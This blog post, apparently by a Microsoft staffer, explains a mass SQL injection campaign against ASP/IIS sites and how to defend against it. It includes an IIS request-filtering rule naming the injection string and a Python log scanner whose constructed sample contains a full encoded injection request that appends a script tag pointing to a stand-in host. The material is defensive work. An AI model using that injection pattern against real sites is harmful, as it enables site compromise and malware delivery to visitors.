Hacked Web Applications causing storm - rattling Windows...

For the past few days a "cyber attack" has been taking place, and according to internetnews.com:

"number of infected IIS servers at 282,000. Less than a day later, security firm F-Secure wrote its own blog entry , putting the infestation at over 500,000"

and F-Secure:

"Performing a Google search results in over 510,000 modified pages."

Without pointing out the reporting inconsistencies between servers and pages, what is actually happening here?


First of all, it's not at all related to the security advisory that was released last week. Nor is it in fact related to any other security issue with IIS, ASP, ASP.NET or Windows. It's really important to understand that: it's all to do with dodgy and insecure development practices.


Very simply put, it's an age-old SQL injection attack on a web site that modifies the returned page, adding a hidden link to a site that downloads malware to the client viewing the page. Nothing new technology-wise here, just a new method of delivery, which really should not affect those who have kept their machines up to date.


In this case the attackers have chosen to target ASP/ASPX-based web sites that have poorly written input validation, and they deliver their code through the database that backs the site's content management system. The result is that pages on the site return a hidden script tag pointing at one of the sites listed in the earlier articles, which in turn picks on particular vulnerabilities present on the client machine, and not just those in software developed by Microsoft.

Well, that's all very nice, you say, but "how do I protect myself against these kinds of attacks?"

The way I see it, there are three areas of responsibility, and each of them holds part of the ability to protect the world against those few malicious people.

1. The Developer - FIX YOUR BROKEN CODE! Seriously, check your code for possible attack vectors and test, test, test. I've seen heaps of web sites and web servers compromised due to poorly written or non-existent validation checking, or incorrect security settings deployed to high-risk environments. Don't always assume you know who is going to access your app. Don't assume that the app will exist with everything local to it. Catch those errors. I could go on. There is heaps of guidance around this; here are a few to start you off:

2. The Client - Keep your machine up to date; as Coatsy says, "go to update.microsoft.com and Download the golden padlock of goodness" from Microsoft Update.


3. The System Admin / Hoster / Guy who has to run the web server - Hey, I sympathise with you most (of course I would!). You have to get a site with poorly written code up and running, and now what? You have to check that the thing isn't going to compromise your server, but of course the code supplied doesn't work under your standard, locked-down security settings, so you need to bend the rules to allow that code to work... Be strong!

But you may have been too late, and now you have to clean this mess up on your server. How are you going to prevent this malicious code being delivered to and from your server, while keeping everything up and running?

Stop the attack coming in

If you are using IIS7, or URLScan on IIS 6.0/5.1, you can filter requests to block the incoming attack. In IIS7, this is what the configuration looks like in your server-wide applicationHost.config file (based on the info in the articles):

<system.webServer>
  <security>
    <requestFiltering>
      <denyUrlSequences>
        <!-- Reject any request whose URL carries the URL-encoded opening of the injection string quoted in the articles -->
        <add sequence="DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300" />
      </denyUrlSequences>
    </requestFiltering>
  </security>
</system.webServer>
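Before (or after) switching the filter on, you will want to know whether the payload has already hit your server. The following is an added example, not code from the original post: it scans W3C-format IIS log lines for the DECLARE/CAST pattern quoted above and decodes the UTF-16LE hex inside the CAST so you can read the T-SQL that was actually sent. The log lines and the hex payload are constructed here for the example.

```python
import re
from urllib.parse import unquote

# Matches the shape quoted in the post: DECLARE @S NVARCHAR(4000);SET @S=CAST(0x<hex> AS NVARCHAR(4000))
CAST_RE = re.compile(
    r"DECLARE\s+@\w+\s+N?VARCHAR\(\d+\)\s*;\s*SET\s+@\w+\s*=\s*CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR",
    re.IGNORECASE,
)

def decode_cast_hex(hex_digits: str) -> str:
    """The 0x... literal inside CAST(... AS NVARCHAR) is UTF-16LE; decode it to readable T-SQL."""
    return bytes.fromhex(hex_digits).decode("utf-16-le", errors="replace")

def scan_iis_log(lines):
    """Walk W3C extended log lines; the #Fields header tells us which column is which."""
    fields, hits = [], []
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        cols = line.split()
        if len(cols) != len(fields):
            continue  # malformed line, skip rather than guess
        row = dict(zip(fields, cols))
        # The payload arrives URL-encoded in the query string, so decode before matching.
        candidate = unquote(row.get("cs-uri-stem", "") + "?" + row.get("cs-uri-query", ""))
        m = CAST_RE.search(candidate)
        if m:
            hits.append({"client": row.get("c-ip", "?"),
                         "uri": row.get("cs-uri-stem", "?"),
                         "sql": decode_cast_hex(m.group(1))})
    return hits

# Constructed sample log: the hex is generated from a stand-in statement so the example runs offline.
SAMPLE_SQL = "UPDATE pages SET body=body+'<script src=//example.invalid/x.js></script>'"
SAMPLE_HEX = SAMPLE_SQL.encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 7.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2008-04-25 10:12:01 192.0.2.10 GET /default.asp page=1 200",
    "2008-04-25 10:12:05 192.0.2.77 GET /products.aspx "
    "id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + SAMPLE_HEX
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200",
]

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['uri']}: {hit['sql']}")
```

Both this scan and the request filter only see the URL; the same statement arriving in a POST body or a cookie is invisible to either, which is why fixing the code (point 1 above) is the real cure and the filter is a stop-gap.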

Stop it going out

This is a little trickier, but thanks to the modularity of IIS7 (the only version I'm going to look at here) you can very easily write a module that inspects every response, scans it for the injected URL sequence and strips it out before it reaches the client. More information on writing modules is at the IIS.NET website. Hey, if I get enough comments I'll write one and post it up here!

Done and Dusted

What we all need to remember about these kinds of attacks is that the vulnerabilities in the targeted web sites are not limited to one particular operating system platform. SQL injection is rampant in many platform-agnostic applications, and it is such a simple thing to prevent.

As you have probably guessed I'm pretty passionate about this subject, and when I see such misguided reports and irrational reactions to incorrect or misunderstood information, it inspires me to ensure that the truth of the issue is available. Speaking personally, in my short time at Microsoft I have never seen such commitment behind ensuring that the Windows operating system is the most versatile and secure operating system on earth.

- jorke

Note: Graphics "borrowed" from Microsoft Japan Security Bulletins

Technorati Tags: SQL Injection, Security Vulnerability, IIS, Windows, Microsoft